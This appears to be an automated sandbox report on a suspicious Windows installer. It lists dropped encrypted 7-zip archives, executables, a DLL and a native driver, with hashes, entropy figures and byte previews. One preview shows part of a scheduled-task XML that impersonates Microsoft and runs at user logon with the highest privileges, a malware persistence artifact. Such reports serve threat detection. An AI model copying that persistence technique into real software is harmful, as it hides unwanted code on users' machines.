                        Preview:7z..'.....C.........2..........oJ...>*.......^5."?<.l.,.r.Xed6G..!G[.]k]KR.lF...},...dm.L.k..e^.3...<H../.9...3.].K......B....x.....J.5.`.H.![.7..4.w.j..6-A...F..u.*...n..;.".'>_...8]G.Tm.5..-.....4.c.)b.$wM..F..}...e\.H.G.J.B...T.K.$...b.K.}2~.........}...u..5*.6LP.3..Ou*..U....ZK...4.iGP.......wS..4@.....<..^...%fd.u..S.z.g.......X..\.x.fX..H......a(..S:...Mo..f. .......M..%~[.R%.=Pv.Y.P.MK..G.......V.X........n.8.8...C|..$...4.P.Z..PQ.)..4$n..g..J7....W..|U.h.....G...p.P..!.Hv...4PC.y..,.I..5.hv(E.^..;...0.:...5`w.....Fm}|..}.'.....6.......jBfJNJ.G..*\.Kd.4...".z..H.AL~.c...%)i.$.|..0.l...........M....9.C..O..^ ..2Kf..H...k...V....$...'.l...H}....TZ2....H..v37...........$..y....n......R...d..\...6..-..l....4.._..J.+.CwZ...0...8.#.t...E.*..v.....i.9.6...H'....L.17...CT...M.......o..xk.Y..U..wrzX.ceh5/.v...m...T..?K...Z(;.U...*...YX..f$.~.d).....fd....9.W..&...}M!dTy{`\x.......oE;..2_j.k.....P.w.Og..)C.IW.8?s.q....PC..C..p(.......s....
                        Process:C:\Program Files (x86)\Windows NT\7zr.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):56546
                        Entropy (8bit):7.996966859255975
                        Encrypted:true
                        SSDEEP:1536:crCPEbYP46GiC3q6cGOlLvjmS9UWgvy/F2QFtTVAe:iCIR913q8wjmS9bhKe
                        MD5:CEA69F993E1CE0FB945A98BF37A66546
                        SHA1:7114365265F041DA904574D1F5876544506F89BA
                        SHA-256:E834D26D571776C889E2D09892C6E562EA62CD6524D8FC625E6496A1742F5DBB
                        SHA-512:4BCBB5AD50446CD4FAD5ED3C530E29CC9DD7DDCB7B912D7C546AF8CCF7DA74BC1EEC397846BFB97858BABC9AA46BB3F3D0434F414BBC3B15B9FDBB7BF3ED59F9
                        Malicious:false
                        Preview:.@S....c...l ...............3...Q...R]..u&.(..c...o.A..q?oIS.j..O[..o..&....L)......Rm.jC,./....-=...Z.;..7..tH..f...n#.7.P#..#o..D..y....m........zH.!...M.|......Vs.^.Rb.X`....y.T.Sg....T.....E.?/.H.;h.)P.#.pz.LOG$..."L(.....?.D*.6g.J!.>.....f.....J..B..q...;w]9.v...V...$....L/m.H#..]...G....QQ..'.z.!NW~..R..y....E.)....m.k%....+....>....02../..M....b.l..f7..f?-~_..E.5.~....*.'....8?.n........x...#....9.........q.q.n...\....D.Uv9.9...P.j7P~q9[BV...>C..[F..k-UL(jfT..\..{d.v;.5.e.fb.3^+...Z|]S3G...$..H=.W..c...B...).v.D!...s...+.K...~=..l.2...X.m.-....m0.....p...>...d......e.J..gUr*4....vw.........T.cQ......\...]...Z{..q..n..'Ql.$..V.U9..j 4...9<..6i.....5.F.).k.LQ4.H...2..p.*.bQJ..4.K'C...#.%"q.u../zoXL...L...........'..g11=E.....y.8...~.Oe..X....u.M8.T.....Qq.m.........i....F.4e.([Hm.*...E....2........s. *R..{."4.x.]...-.....xQ@.z.......Bz.).[..C...T..".....q............M.X..CQ..A..........d...`S.3...e.X.....u.>.!..;k...>..
                        Process:C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp
                        File Type:7-zip archive data, version 0.4
                        Category:dropped
                        Size (bytes):56546
                        Entropy (8bit):7.996966859255979
                        Encrypted:true
                        SSDEEP:1536:cWsX30GkPK2rw7bphKKdxDBxjqtalDFMflaX4:cZXhkPhr+TRJqtaK
                        MD5:4CB8B7E557C80FC7B014133AB834A042
                        SHA1:C42E2C861FF3ED0E6A11824E12F67A344E8F783D
                        SHA-256:3EC6A665E7861DC29A393D00EAA00989112E85C6F1B9643CA6C39578AD772084
                        SHA-512:A88E78258F7DB4AECD02F164E6A3AFCF39788E30202CF596F9858092027DDB2FDB66D751013A7ABA5201BFAFF9F2D552D345AFE21C8E1D1425ABBC606028C2E6
                        Malicious:false
                        Preview:7z..'....O; ........2.......D.X..Z.2..7nf..R..s# s..v.f.....%G..>..9..Jh.-j.r..q.2.=v..Q.....SW7....im..|.c...&...,.s....f.h...C.g~..f.7=9...,...sd....iD......cR.^...$..<....nd...S.O..E)0..SQ.AA.C..$.D.|. a.:..5.....b.....2......W.....Z.pS.b/.F.;|`...O/....@.......4.".b.(...4...,..h/.K$..r!...."..`.S...D?.":...n..f.{C..t..,/.S.0.N..M...v...(.Yn..-.)..-...N~....}..).. .j!...1H.7?R..X.....rKi....9.i[k..+.....Br\.=.k.t8...6Lmh.../.V^K.f.......*.@MM..`...,W.......E..v.H....0.W..~....I.....w....<....X.Azl.FH..6\.a..E?=..I.q.5...s...;.,J.0..J.../.w..,..n.EkN..,j....f.y&q.C}fnY..2\......0.....N!.J..H.H0.....BJ.Q..v}=......^c.'w..#...d.T1....#...2s}N.....2.%.?. ....l.).....a<5Y.s....}...2*.#s..]0h..._G....3].....7y.}.B.6...ywE....'q.....h..?p .#..Emm2..F..| .M.Rv!.v.G....1L.Kx...T...".a6.%S0..g..7.......J.vjO.{.A....B@.c.y>}.....N.+....:.L=[....._.....Y.{....F..|.w.oX..t&[.....a\.M..2.Qe.[}L.Ch[...G.S#.$9...8<..W.d1...*PH.`.....4.A.......?..g.
                        Process:C:\Program Files (x86)\Windows NT\7zr.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):31890
                        Entropy (8bit):7.99402458740637
                        Encrypted:true
                        SSDEEP:768:rzwmoD5r754TWCxhazPt9GNgRYpSj3PsQ4yVb595nQ/:vwmolXaT9abVzP1TC
                        MD5:8622FC7228777F64A47BD6C61478ADD9
                        SHA1:9A7C15F341835F83C96DA804DC1E21FDA696BB56
                        SHA-256:4E5C193D58B43630E16B6E86C7E4382B26C9A812D6D28905DD39BC7155FEBEE1
                        SHA-512:71F31079B6C3CE72BC7238560B2CBD012A0285B6A5AC162B18EAE61A059DD3B8DBCF465225E1FB099A1E23ED7BDDF0AAE4ED7C337A10DC20E0FEEC4BC73C5441
                        Malicious:false
                        Preview:.@S......................xi.\ .~.#..:}..fy?koGL^|kH.G...........x....Tg.Y.t....~^..".L.41.....R..|.....R...C.m(.M&...q.v.$..i..U.....).PY.......O.....~..p.u.Y.......{...5^q.|a.]..@DP".`Rz}...|N.uSW.......^..o...U..z...3...bH........p.......Y`..b.t.x.F^i.<.%.r.o..?w.Z..M.fI.!.a...Zsb.+.y..W...n.....;...........|.{.@Q.....#".M...4.A).#;..r...>E..]w{.-....B...........v..`...S...sY....h.Sa)...r.3.U;n8wXq.x...@^z...%8H.Zd._..f~.....u[..q$..%......C..../].rS.....".=..<o.<S....-^"..iIX..r...D.......k.P.e...U..n.]^p..pal....E.c..+..Gc..U?s.R...p...:>..v..o2..B.Hn..q...F..3.o...%.......C......*.V..|..2.J..i.r....|;T.C6).......a..~"K....Y.....]3.{{..N...X>.1.....:?....,..T+=s...............so.;....&....Q.\K..b............k,..#l...Yb...VE.g.3v.$'.H3......w.....{f..e.....PS.tQ..*.8a....5w....\8%..c.;......q.j.t0/.8s..(9....... .S...0.o.o......f*..]....U..>N....Kc/..ka.I"O-O.!./..S".IN .....%G...........x%..ZL`Sq.;.}w.`..k.....F.........Tp..}..?t..
                        Process:C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp
                        File Type:7-zip archive data, version 0.4
                        Category:dropped
                        Size (bytes):31890
                        Entropy (8bit):7.99402458740637
                        Encrypted:true
                        SSDEEP:768:jh43RfBLJT55mgLMoqX3gX/i69sXCuWegxJr8qF88M:qhj+I7qCKNSegPnFM
                        MD5:CE6034AFC63BB42F4E0D6CD897DFBCB8
                        SHA1:49E6E67EB36FE2CCAA42234A1DBB17AA2B1C7CC0
                        SHA-256:7B7EB1D44ED88E7C19A19CEDAA25855F6800B87EC7E76873F3EA4D6A65DAA25F
                        SHA-512:7801FA33C19D6504FF2D84453F4BB810FD579CB0C8772871F7CC53E90B835114D0221224A1743C0F5AAE76C658807CC9B4EC3BEC2CAD4AB8C3FD03203DAA7CF0
                        Malicious:false
                        Preview:7z..'....oYU@|......2.........Z....f..t.#.............tb.7E..Jo.........b.I=.Y..6(..=....^..>i.^E.."q.$&8....N...p+.p. .P.z6.b,.8kdD......'...G.R.n.&5..C..H.E..So!T^n{.a#d....z.SB........Nb.........LO+B ...iV..HH.Cc*.o@|.....Yvxb^.cW....._.........m.}.(V.i.H$....R....`.M.p......A?....._..nb..D.*RT<bUV.n].....LD.qU.....U9....]...h..y!...I....&C......g`...YahZ.q4.{.....2ZRG..f.. .M....:t .........8..Eg.....o.....h.]{..........p...M...lh.@.(R.]!B.:...b78$...b.......hc...C~....I..B<.x_OB|...<. .=NZ.....z........sjJ.....*{<..L.......^...9..^d..$d..}......#.dL'~.}....M...j.(5..@.tcVm.H..-.n...D..&....<..Z...@]./7?...[..qfW..!...v...==..d..M..om~).....C..9....c<..WUV.ed.h...]....OCt(X.H<<:.9..{5j....Nh.L.$..>..D..haP..~...............}r=!.E.ng..........9+...2.g.H3Lx.Bu....]jC...q.g.g.U.4..<........)....oo.T.c_.......X.,.@...nu......D.B(~.5....x5...............4S7B..p...Uk.0-m.VM.M@.V\.o...(......".k..w....Z.([.@.MQ.i9..."W..m...N.,.
                        Process:C:\Program Files (x86)\Windows NT\7zr.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):74960
                        Entropy (8bit):7.99759370165655
                        Encrypted:true
                        SSDEEP:1536:x2PlxAOr0Y07RqyjjkFThaVNwDsKsNFBrFYek36pX4MDVuPFOnfIId+:QAOrf07RHjkFThaVGMLF3hNDcPFOn5s
                        MD5:950338D50B95A25F494EE74E97B7B7A9
                        SHA1:F56A5D6C40BC47869A6AE3BC5217D50EA3FC1643
                        SHA-256:87A341B968B325090EF90DFB6D130ED0A1550A1EBDE65B1002E401F1F640854A
                        SHA-512:9A6CC00276564DDE23D4CABA133223D31D9DDD06D8C5B398F234D5CE03774ED7B9C7D875543E945A5B3DB2851EC21332FE429A56744A9CC2157436400793FF83
                        Malicious:false
                        Preview:.@S........................F.T....r...z'I.N..].u.e.e..y.....<|r.:v.....J.i...L.Sv.....Nz..,..K.sI*./.d.p.'.R.....6eF....W{."J.Nt'.{E....mU_..qc.G..M..y.QF)..N..W.o.D!.-...A$.....Nc.(...~.5.9'..>...E..>.5n..s..W.A7..../..+..E.....v..^&.....V..H6..j..S`H.qAG.R.i^&....>@SYz.@......q.....\t=.HE...i..".u.Z.(y.m..3.0\..Wq9#.....iH7..TL.U..3,b........L...D..,..t(mS..06...[6.y....0-....f.N7..R......./..z.bEQ.r..n.CmB'..@......(...l..=.s........`.6.?..[mzl....K.5"..#*.>.~..._...A.%b..........PnI.T...?R~JL<.$V..-.U..}\..t/F..<..t....y(K..v..6"..'.!.*z.R....EJ0.d<v:.R&......x...2....;Tc..(..dW...7a.)...rq.....{"h.wbB..t)f..qj........~.XR.a/........l./.S......".%?.C.cL._.,k.n'....a./.z...{.]...<......._pFP..d..,......Q...[........3...Kq).rJ..8..I.)o...i'Q..=......(dq(.m../..%=.......r m.X|3.......b.~tA.......%+.T..E@..ce...%....,..x#...,....-....A...q.....r.+...?......L..%.c.... ..>.Iw......P...O)...$`.'..D1.r.....*..9;..R...VL.]..%j.....TM.4.....P.L...
                        Process:C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp
                        File Type:7-zip archive data, version 0.4
                        Category:dropped
                        Size (bytes):74960
                        Entropy (8bit):7.997593701656546
                        Encrypted:true
                        SSDEEP:1536:xsn0ayGU0SfvuEykcv5ZUi4Q9POZBgfmWRDOs2XwV1NN4+8wbr82nR+2R:xY0ntfvwkcv5ZwYPCBgfmW/VDS+FbrLN
                        MD5:059BA7C31F3E227356CA5F29E4AA2508
                        SHA1:FA3DC96A3336903ED5E6105A197A02E618E3F634
                        SHA-256:1CBF36AFC14ECC78E133EBEC8A6EE1C93DEA85EEC472CE0FB0B57D3E093F08CC
                        SHA-512:E2732D3E092B0A7507653A4743E1FE7A1010A20D4973C209BA7C0B2B79F02DF3CFDB4D7CE1CBFB62AA0C3D2CDE468FC2C78558DA4FF871660355E71DC77D8219
                        Malicious:false
                        Preview:7z..'....G8{p$......@..........0..$D.#'7..^..G.....W.K^.IC;.k...)_...S...2..x.....?(..Rj.g.......B...C..NK.B0s..L?.$..].....$r..E.]~...~K..E..3.......t..k..J......B...4.?!..6r.Qqc.5.r...\..,A.JF.J...Vb..b...M.=^.K7..e..]...X.%^3T...D.y..e2..>...k...\...S.C....')......hhV..K...z4..$d....a[.....6.&.D.:.=^.8.M[....n..i[....]..Y.4...NpkjU..;..W5.#.p.8?u....!.......u.[?.$..^.}f.A..G.N...b7.*...!!.(.....Gc..........Dg....Z.*.#.\".e.m.).t.5..r...6"....Q......fx..W......k..K7^."C.4*Z.{.^WG.....Z..P......Z....7R.....5hy...s....b.....7.V.....k.=.y.i.i......Y.......FY$.|T.5..V...E|...q.........].}bl...y.....;...q....-a..RP3..L~k....|..p_......."......rJz."..v......Z....l1.O.N...Di...O.:m.X...W.......x..}..>ktk.,.~...n-.m..`...G......$.....].lPx..<..9.m4.n...d....G...{'.a........u).R.+.....y.`.p...1@..!..b...J.W..Vt,......h...k....W.,..@Sd.<ZG......}&.R.]p(Y...o...r.4m:.J`.U..S5.iN...^!Y..hHP.B.58....JvB.K.k;...4........\.6=&erz..2..&...Z.C...h_.
                        Process:C:\Program Files (x86)\Windows NT\7zr.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):29730
                        Entropy (8bit):7.994290657653607
                        Encrypted:true
                        SSDEEP:768:e7fyvDZi63BuPi2zBBMqUp6fJzwyQb91SPlssLK4:AfKNiG/2vMx6fJzwVb2tss7
                        MD5:2C3E0D1FB580A8F0855355CC7D8D4F7A
                        SHA1:177E4A0B7C4BC8ACE0F46127398808E669222515
                        SHA-256:9818FEBDE34D7E9900EB1C7A32983CA60C676BE941E2BC1ED9FBD5A187C6F544
                        SHA-512:B9410FC8F5BE02130D50E7389F9A334DD2F2A47694E88FBB9FB4561BD3296F894369B279546EEBB376452DF795C39D87A67C6EE84C362F47FA19CF4C79E5574E
                        Malicious:false
                        Preview:.@S....*z.p,..................kcn..a.^.<..=......7`....6..!`...W.,2u...K.r.1.......1...g<wkw.....q..VfaR...n.h.0b[.h.V$..7.7'd.....T.....`.....)k.....}..........bW'.t..@*.%e5....#.6.g.R.......,W....._..G.d...1..e/...e7....E.....b....#Z,#...@.J.j?....q.ZR.c.b.V....Y-.......3..&E...a.2vg$..z...M9.[......_.1U....A...L.0+3U.[)8...D........5......[..-.u...ib...[..I-....#|j..d..D.S.'.....J.`.....b..y...Iu.D.....2.r}.4....<K.%....0X..X[5.sD...Xh.(G...Z;.."..o..%.......,.y..\..M6.+,.]c..t.:.|...p%.../1%.{>..r..B..yA.......}.`.#.X....Rl`.6\~k.P8..C....V\^..2.7...... h. .>....}..u)..4..w..............^N...@.v....d.P...........IA.. G?..YJ>._La..Y.@.8N.a...BK.....x.T....u.....\x.t...~.2p.M..+.R&w.......7c!v.@..RGf.F.>^+.b=........@l.T5.:........#}.%>.-.C.[XR.TG.\..'....MH..x..Y...cL........y.>....%...:.S.W^..k.EE.5O`.6<5-kh_...."95..:p....P.jk`....b.7.Z.8Y....H(j2y..`d.q;RyZ.5$..3.;......0,......+O.....L.,..u.s....S.1o.g...l"..e.....Cy<....I.+..B@......~.0...<.
                        Process:C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp
                        File Type:7-zip archive data, version 0.4
                        Category:dropped
                        Size (bytes):29730
                        Entropy (8bit):7.994290657653608
                        Encrypted:true
                        SSDEEP:768:0AnbQm4/4qQyDC44LY4VfQ8aN/DObt1dSt3OUqZNKME:0ab6c4oY0aBDObjot+Uqu7
                        MD5:A9C8A3E00692F79E1BA9693003F85D18
                        SHA1:5ED62E15A8AC5D49FD29EF2A8DC05D24B2E0FC1F
                        SHA-256:B88E3170EC6660651AF1606375F033F42D3680E4365863675D0E81866E086CC3
                        SHA-512:8354B80622A9808606F1751A53F865C341FF2CE1581B489B50B1181DAA9B2C0A919F94137F47898A4529ECCCD96C43FCCD30BCDF6220FA4017235053AF0B477D
                        Malicious:false
                        Preview:7z..'....G..s......2......../.....h..f...H=...v.:..Q.I..OP.....p..qfX.M.J..).9;...sp......ns./..;w....3.<..m..M.L...k..L..h[-Dnt.*'5....M(w%...HVL..F&......a...R.........SF.2....m@X&X5.!....ER......]xm.....\.....=.q.I.}v.l#.B........:.e....b6.l.d..O......H.C..$.',.B..Q\..\.B.%...g...3?.....*.XuE.J.6`.../...W.../......b..HL?...E.V[...^.~.&..I,..xUH..2V..H..$..;.....c.6.o........g.}.u:.X....9...|Ynic.*.....ooK..>..M~yb..0W....^..J(S......Q?...#.i.1..#.._.9..2E.S7c.....{..'...j.A.p......dS]......i.!..YS...%.Q<..\.0.....FNw....e...2...$..$4..Pv.R...mv...-.b.T.)..r*..!..).n4.+.l[.N...4qN....w.B..[......<U.etA.A....SB..^y.......^0.f._.&..Z.zV.%.R.f_dz.,E..JJ..%.R.7.3m.:..;.`...AoHLHC..|..)f...C....$...E....H"x..F....wW...3"......Y.*Y.....5....,E...tn.KS...2......w\Z..1.".O.=+..A...2.....A.........k. c..../2..i!q..q...u.'.m.6.j.\.....x...S....$....*.&(.).^..f.d.g"j..#^....W.]{.C.?2Z.'X...5.._@..q.j..Xb...n{1..<.i...'r...7'.F.L\(.8
                        Process:C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp
                        File Type:7-zip archive data, version 0.4
                        Category:dropped
                        Size (bytes):249968
                        Entropy (8bit):7.999303164107084
                        Encrypted:true
                        SSDEEP:6144:K7uc9uX4FyDbSpY3S7Z/Xjm3sGhiO1E0u72BDT0BVIe9tz:UuRX4Q+ksGrTu8DTs9tz
                        MD5:F3680A817D62E5327D9AA7F965C66559
                        SHA1:9346F4AA534F1B90E9F39AE3D945195B62DC4218
                        SHA-256:39CA13B6C0C9A99BF516874DE1665E628ACC08DB2DCB8AC3C292C72FC9640C72
                        SHA-512:B2E01984421AADB6DF32D5C3A2897A43329DC359E507372E1BC89DBC8318058804D2B3A793574A9C273857A64269538A6DA5DA4076F72E17C394DF275AA979ED
                        Malicious:false
                        Preview:7z..'...G.1\........@.......3.....|...c..&....:*Y.~..e&'~O.ye.m...@.M..9..}.....[g]..%i..#T...#.6o.f.....?O....JnqK.dtJ.4RG...X.1]D..B.._7k.P.g.b.K>.V.5.Ls.Y..I....X.....xV...;bib.'q../.J+.D...p...L..+)3...4.....N>uN...^..J$.K@jc..S....+w.?.{C.$<....Qe..g...[....H.(....p.JZ8..Mm..x.'xa.A......m..ntX.e..*.50...]z.,....K7k.<....o...0...s0.p[.....o..k%...N6.....>\.=[..M.....U.bN=.*....q..y'..q.../.G!....K.z...8.W.kS..;...T.K .3|...j.l.....W.l.).DLb...".7@..|.L,...8I.6...1....c.u..n.]#.......p.~|5.a.*.`.v..&...2).)&sa.e..A........)a%Y.....\..$.h|..:..IvXV.....?.z.[....b.ULStfm...6..........<U.wX...G....G..zk.9a.g...x.`.!...G.Y5.v..;;......P#..u...x..r.....i..W..zx..)q.R.!...?..N.go..K...@...}...".BD#..^..9.=.-.3)..#..jd...>,i....vC.BG...S......f?.....k.c.p...l.".bz.{.wm..9....|/...(.x.X..Y...X..._.....8./.U.......jk..n.....cI......b.....Z..X....*J_eRi.C...p.xN_J..;.b.t.Y*...&!...-.....KH...JK)...]'W../.:.Rv....q.sh`.T.{..Gh...j[..n...|..
                        Process:C:\Program Files (x86)\Windows NT\7zr.exe
                        File Type:PE32+ executable (native) x86-64, for MS Windows
                        Category:dropped
                        Size (bytes):63640
                        Entropy (8bit):6.482810107683822
                        Encrypted:false
                        SSDEEP:768:4l2NchwQqrK3SBq3Xf2Zm+Oo1acHyKWkm9loSZVHT4yy5FPSFlWd/Ce34nqciC50:kgrFq3OVgUgla/4nqy5K2/zW
                        MD5:B4EAACCE30F51EAF2A36CEA680B45A66
                        SHA1:94493D7739C5EE7346DA31D9523404D62682B195
                        SHA-256:15E84D040C2756B2D1B6C3F99D5A1079DC8854844D3C24D740FAFD8C668E5FB9
                        SHA-512:16F46ABE2DD8C1A95705C397B0A5A0BC589383B60FE7C4F25503781D47160C0D68CBA0113BA918747115EF27A48AB7CA7F56CC55920F097313A2DA73343DF10B
                        Malicious:false
                        Antivirus:
                        • Antivirus: ReversingLabs, Detection: 3%
                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......s.[.7.5N7.5N7.5N7.4NX.5NA'NN4.5NA'HN5.5N.|XN4.5N.|HN6.5NA'XN6.5N.|DN0.5N.|IN6.5N.|MN6.5NRich7.5N........................PE..d....(gK..........".........."............................................... ..............................................................d...(........................(.......... ................................................................................text............................... ..h.rdata..............................@..H.data...............................@....pdata..............................@..HINIT................................ ....rsrc...............................@..B.reloc..0...........................@..B................................................................................................................................................................................................................
                        Process:C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp
                        File Type:data
                        Category:dropped
                        Size (bytes):4096
                        Entropy (8bit):3.347329250663303
                        Encrypted:false
                        SSDEEP:48:dXKLzDlnbL6w0QldOVQOj933ODOiTdKbKsz72eW+5y9:dXazDlnKwhldOVQOj6dKbKsz7
                        MD5:0B22A2EDD065A1C81E971548277C256F
                        SHA1:E8C9021B2A56BD2845B2E4322A77755AE12FE197
                        SHA-256:C45C719A48CE574E67FDA9B816E972913BDCC33A5B414DFC9A31E5B55118E50B
                        SHA-512:8D36C6B062EB505CCF3B2E69307FD2526D8FD0D6DA411E8E26266ACC7DFD4B7330B01CF7161F0F8CB6B75C547A3F15525EF5DC18BB25BE34B214522D24942E95
                        Malicious:false
                        Preview:<Task xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2005-10-11T13:21:17-08:00</Date>. <Author>Microsoft Corporation</Author>. <Version>1.0.0</Version>. <Description>Microsoft</Description>. <URI>\kafanbbs</URI>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user</UserId>. </LogonTrigger>. </Triggers>. <Principals>. <Principal id="System">. <UserId>user</UserId>. <RunLevel>HighestAvailable</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvai
                        Process:C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp
                        File Type:PE32+ executable (console) x86-64 (stripped to external PDB), for MS Windows
                        Category:dropped
                        Size (bytes):5649408
                        Entropy (8bit):6.392614480390128
                        Encrypted:false
                        SSDEEP:98304:jgRfP5jnFTyGZEWxSIBHVGT+t1ufqchZ:kRZDFTyGaHIJoWofqc
                        MD5:8C71B86BF407C05BAF11E8D296B9C8B8
                        SHA1:6624AB8CA883C48F02C58250D4EEE9E90098F4E4
                        SHA-256:BE2099C214F63A3CB4954B09A0BECD6E2E34660B886D4C898D260FEBFE9D70C2
                        SHA-512:BB3FEE727E40F8213F0A7D9808048E341295A684ECBA6F4DF52F1B07B528D7206CA41926B2433F4B63451565AD2854570FEE976BC7051B629ACD24FCA6D0F507
                        Malicious:false
                        Antivirus:
                        • Antivirus: ReversingLabs, Detection: 0%
                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......................&.ZF..0V..<.............@..............................V.....L.V...`... ...............................................V../...........0O..............`V.\a...........................vL.(.....................V..............................text....XF......ZF.................`..`.data....z...pF..|...^F.............@....rdata.. 9....F..:....F.............@..@.pdata.......0O.......O.............@..@.xdata........Q.......Q.............@..@.bss.....;....U..........................idata.../....V..0....U.............@....CRT....h....@V.......U.............@....tls.........PV.......U.............@....reloc..\a...`V..b....U.............@..B................................................................................................................................................................................................................
                        Process:C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp
                        File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                        Category:dropped
                        Size (bytes):3584000
                        Entropy (8bit):7.00283805408099
                        Encrypted:false
                        SSDEEP:49152:E7vv7WClWZ7sR4YW+AKb+JE/zEVa9BKRe71MzuiehWIKxZFh2GSTujbNMLC+z/gQ:E7H77lWrYW+X4Va9BKRe71MzSRi6yQ
                        MD5:4DB75814BF4A212D3AEBA5831C059402
                        SHA1:3674F7371C875A8E338C3374D5C5B58420944C55
                        SHA-256:5FB9A89D21C3DD25609F2CA92B3944264226065CD8DC13736E9B316951FB9256
                        SHA-512:290931B408148D7B6D513A3CE91628827E8469BDE9CDFEC58499ED38AC0023A4AD11B7FD0068FDC91D683A87BBBA7338338582B0D5AAF7351BE155986035E3BC
                        Malicious:false
                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....fg...........!.....P..........E........................................ 7...........@.........................H#.......*..<.....6.X.....................6.d?..........................x.......................+...............................text....O.......P.................. ..`.rdata..<....`.......T..............@..@.data........`.......J..............@....00cfg.......@(.......(.............@..@.tls.........P(.......(.............@....voltbl.F....`(.......(..................j)q.....X...p(..Z....(............. ..`.rsrc...X.....6......j6.............@..@.reloc..d?....6..@...p6.............@..B................................................................................................................................................................................................................................................................................
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):64
                        Entropy (8bit):1.1628158735648508
                        Encrypted:false
                        SSDEEP:3:NlllulLhwlz:NllUO
                        MD5:F442CD24937ABD508058EA44FD91378E
                        SHA1:FDE63CECA441AA1C5C9C401498F9032A23B38085
                        SHA-256:E2960AF08E2EE7C9C72EEA31DBBFE1B55B9BF84DE2DD7BB7204487E6AF37B8F6
                        SHA-512:927E2EEA0BB3FC3D3A0DA7F45644F594CE29F11D90A84B005D723500258DE9E8B3780EB87242F4C62B64B9FEEA1869FC16076FA3AC89EC34E0546CDE1BEF7631
                        Malicious:false
                        Preview:@...e................................................@..........
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                        Process:C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe
                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                        Category:dropped
                        Size (bytes):3366912
                        Entropy (8bit):6.530549308235048
                        Encrypted:false
                        SSDEEP:98304:nJYVM+LtVt3P/KuG2ONG9iqLRQE9333T:2VL/tnHGYiql5F
                        MD5:CCFB5265302C0ED10D4EE3C9C00B07B1
                        SHA1:C89AAFB9E83EF08F32610D12C15840E3ADD3DD06
                        SHA-256:15B6D6F84E5D1A01AE0493EF947045BE2759BF942C603F89A5CD40E01C8894D0
                        SHA-512:0E0CE33F8A70E16753FFA8CB37D60998AB4E2D588E4C661C08568678615D473F6391B5E828B203C3DA5423FD71ABDFF322EDBAFF4273867F30C9A42E6523E99C
                        Malicious:true
                        Antivirus:
                        • Antivirus: ReversingLabs, Detection: 0%
